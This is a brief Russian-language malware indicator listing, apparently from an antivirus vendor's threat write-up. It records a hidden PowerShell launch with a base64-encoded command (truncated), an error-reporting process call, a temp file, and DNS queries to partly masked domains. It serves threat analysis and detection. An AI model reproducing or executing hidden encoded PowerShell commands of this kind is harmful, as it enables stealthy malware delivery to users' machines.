Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGUAcQBzAGgAdwBoAG0AZgBnAHgAdgBnAD0AJwBSAHEAdABuAHkAagB0AHMAJwA7ACQAUgB5AHYAbQBlAHIAcwBvAGEAegBlACAAPQAgACcAOAA0ADQAJwA7ACQAWQBvAHkAYQByAHYAaAB4AGUAbwBxAHMAPQAnAFQAYQBtAHMAeQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1952
- %TEMP%\1231877.cvr
- DNS ASK ru######h-developers.com
- DNS ASK mo##s.xyz
- DNS ASK hi##m.info
- DNS ASK pl#######1-site5.atempurl.com
- DNS ASK dy#####securityltd.com